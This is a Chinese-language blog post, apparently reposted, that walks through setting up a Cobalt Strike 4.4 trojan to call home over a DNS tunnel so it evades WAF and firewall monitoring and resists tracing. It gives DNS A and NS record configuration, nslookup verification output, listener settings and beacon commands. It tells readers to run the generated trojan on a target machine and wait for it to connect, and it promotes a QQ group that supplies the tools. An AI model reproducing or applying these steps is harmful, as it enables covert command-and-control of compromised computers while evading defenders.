轻松绕过waf，内网技术,Cobalt Strike4.4远控木马绕waf流量监控

DNS隧道技术可以解决运控木马无法上线的问题，waf，防火墙对tcp，http，https等端口有流量检测，这个时候我们就可以使用隧道技术，让cs木马走DNS隧道，不仅可以检测不到而且也是一种反溯源的方法。

cs使用DNS反溯源—推荐博客—》反溯源

我这个只是讲如何通过CDN上线cs运控木马，不是我不想跟上面的师傅（反溯源）一样，而是在注册免费国外域名的时候出现了freenom网站不让新用户注册，所以使用不了，这个我到时候再出一篇博客来解决这个问题。

需要：

云服务器

域名

域名解析

在你自己的服务器上面开启UDP的53端口

一.DNS配置问题

首先你需要一个域名（freenom网站可以免费注册，但是最近不知道为什么注册不了），我的是阿里云的。

DNS解析在你购买的域名的网站配置

A记录->cs主机记录->CS服务器IP

NS记录->ns1主机记录->上个A记录地址（cs.域名（如：cs.baidu.com））

NS记录->ns2主机记录->上个A记录地址（cs.域名（如：cs.baidu.com））

这里的ns2和ns1主机名是A的主机记录+域名：cs.域名（如：cs.baidu.com）

验证dns解析是否成功

打开命令行输入：

C:\Users\Lenovo>nslookup cs.t****n.cool
服务器: UnKnown
Address: fe80::1

非权威应答:
名称: cs.t***n.cool
Address: 42.***.***.184

C:\Users\Lenovo>nslookup ns1.t***n.cool
服务器: UnKnown
Address: fe80::1

非权威应答:
名称: ns1.t***n.cool
Address: 0.0.0.0

C:\Users\Lenovo>nslookup ns2.t****.cool
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: fe80::1

非权威应答:
名称: ns2.t***n.cool
Address: 0.0.0.0

配置错误的师傅请加入qq群：184324009

二.cs配置

我的cs是4.4版本的，需要工具的师傅请加入qq群聊：184324009

关于cs的配置我会出一篇cs配置教学

点击进入监听模式

点击添加

设置为

dns地址为NS记录如：ns1.xxxx.com

dns地址(Stager)：为解析A记录 cs.xxx.com

DNS解析服务器为：你cs服务器ip

接下来生成运控木马，要选择下面这个，上面的接收不到

然后发目标机里面运行，坐等上线，上线时间与服务器解析网络挂钩

上线后，会得到一个黑框框，这个时候输入一些命令就可以了

beacon> checkin
[] Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home, sent: 8 bytes
就可以正常

欢迎各位师傅加入qq群讨论，（群主有时间会直播解答疑问）
qq群：184324009
转载于博客：https://www.taoyuan.cool/post-10.html